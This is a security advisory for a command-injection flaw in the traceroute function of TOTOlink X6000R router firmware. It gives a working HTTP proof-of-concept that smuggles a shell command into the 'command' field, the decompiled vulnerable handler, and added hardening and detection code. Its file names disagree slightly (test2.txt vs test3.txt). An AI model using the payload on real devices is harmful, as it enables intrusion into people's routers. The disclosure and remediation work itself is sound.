Headline
CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)
An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.
TOTOlink X6000R V9.4.0cu.852_B20230719 command injection
Product information
Device: TOTOlink X6000R
Firmware version: V9.4.0cu.852_B20230719
Manufacturer's website: https://www.totolink.net/
Firmware download address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html
Vulnerability description
Arbitrary command execution exists in the setTracerouteCfg interface of cstecgi.cgi: the value of the command parameter is placed into a shell command line without any filtering.
PoC
```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 172.28.60.132
Content-Length: 76
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.60.132
Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}
```
The injected command is “ls>/web/test2.txt”.
Injection result:
```http
GET /test3.txt HTTP/1.1
Host: 172.28.60.132
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
Analysis
The handler for setTracerouteCfg in shttp, as decompiled:
```c
__int64 __fastcall sub_415950(__int64 a1, __int64 a2)
{
  const char *v4; // x22
  const char *v5; // x0
  unsigned int v6; // w0
  char s[256]; // [xsp+38h] [xbp+38h] BYREF

  memset(s, 0, sizeof(s));
  v4 = (const char *)sub_40BD6C(a1, "command");   // "command" parameter, taken from the request as-is
  v5 = (const char *)sub_40BD6C(a1, "num");       // "num" parameter
  v6 = atoi(v5);
  // the unfiltered "command" value is formatted straight into a shell command line
  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )
    __break(0x3E8u);
  CsteSystem(s, 0LL);                              // the assembled string is executed by the shell
  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");
  return 0LL;
}
```
The command parameter is concatenated into the traceroute command line and passed to CsteSystem without any filtering, so shell metacharacters in it are executed.
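The following is an added example, not code from the advisory or from TOTOlink firmware, showing how this handler could be hardened and how a captured request body can be checked for the same pattern. It assumes nothing about the real firmware APIs: the names host_is_safe, parse_hops, build_traceroute_cmd, run_traceroute_no_shell and body_has_injected_command are hypothetical, and the hop limit of 255 and the DNS name length limit of 253 are chosen policy values. The two defensive changes are an allow-list on the command value (only address or hostname characters, no leading '-') and running traceroute through execvp() with an argv array instead of through a shell string, so that metacharacters in the input cannot alter the command even if the check regresses.

```c
/* Added example for this page; not TOTOlink code. All names are hypothetical. */
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_HOST_LEN 253   /* assumed policy: DNS name length limit */
#define MAX_HOPS     255   /* assumed policy: upper bound for traceroute -m */

/* Allow-list for the "command" parameter: only characters that can appear in an
 * IPv4/IPv6 address or hostname. Shell metacharacters ('|', ';', '&', '>', space)
 * are rejected, and a leading '-' is refused so the value cannot become an option. */
int host_is_safe(const char *s)
{
    if (s == NULL || *s == '\0' || *s == '-')
        return 0;
    size_t n = strlen(s);
    if (n > MAX_HOST_LEN)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == ':' || c == '-'))
            return 0;
    }
    return 1;
}

/* Parse "num" as a bounded integer instead of calling atoi() blindly. */
int parse_hops(const char *s, int *out)
{
    if (s == NULL || *s == '\0')
        return 0;
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || v < 1 || v > MAX_HOPS)
        return 0;
    *out = (int)v;
    return 1;
}

/* argv for traceroute, to be passed to execvp() directly: no /bin/sh involved. */
struct traceroute_cmd {
    char hops[8];
    char host[MAX_HOST_LEN + 1];
    char *argv[5];
};

int build_traceroute_cmd(const char *host, const char *num, struct traceroute_cmd *cmd)
{
    int hops;
    if (!host_is_safe(host) || !parse_hops(num, &hops))
        return 0;
    snprintf(cmd->hops, sizeof cmd->hops, "%d", hops);
    snprintf(cmd->host, sizeof cmd->host, "%s", host);
    cmd->argv[0] = "traceroute";
    cmd->argv[1] = "-m";
    cmd->argv[2] = cmd->hops;
    cmd->argv[3] = cmd->host;
    cmd->argv[4] = NULL;
    return 1;
}

/* Replacement for CsteSystem(s, 0): fork + execvp with stdout/stderr redirected to
 * the log file (the effect of the original "&>") but without a shell. Returns the
 * child's exit status or -1. Not invoked by main() below, since it runs traceroute. */
int run_traceroute_no_shell(const struct traceroute_cmd *cmd, const char *logpath)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(logpath, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0)
            _exit(127);
        dup2(fd, STDOUT_FILENO);
        dup2(fd, STDERR_FILENO);
        close(fd);
        execvp(cmd->argv[0], cmd->argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Detection helper for captured request bodies: pull out the "command" value from
 * the JSON and report whether it fails the same allow-list. */
int body_has_injected_command(const char *body)
{
    const char *key = "\"command\":\"";
    const char *p = strstr(body, key);
    char value[512];
    size_t n = 0;
    if (p == NULL)
        return 0;
    p += strlen(key);
    while (p[n] != '\0' && p[n] != '"' && n < sizeof value - 1) {
        value[n] = p[n];
        n++;
    }
    value[n] = '\0';
    return !host_is_safe(value);
}

int main(void)
{
    /* Constructed sample: the request body from the PoC above. */
    const char *poc = "{\"command\":\"127.0.0.1|ls>/web/test2.txt|\",\"num\":\"1\",\"topicurl\":\"setTracerouteCfg\"}";
    struct traceroute_cmd cmd;
    printf("PoC body flagged: %d\n", body_has_injected_command(poc));
    printf("benign host accepted: %d\n", build_traceroute_cmd("127.0.0.1", "1", &cmd));
    printf("PoC host accepted: %d\n", build_traceroute_cmd("127.0.0.1|ls>/web/test2.txt|", "1", &cmd));
    return 0;
}
```

body_has_injected_command can be run over logged POST bodies to cstecgi.cgi to find requests of the shape shown in the PoC; build_traceroute_cmd is the replacement for the snprintf/CsteSystem pair, and run_traceroute_no_shell is only called by a handler that actually wants to execute the traceroute.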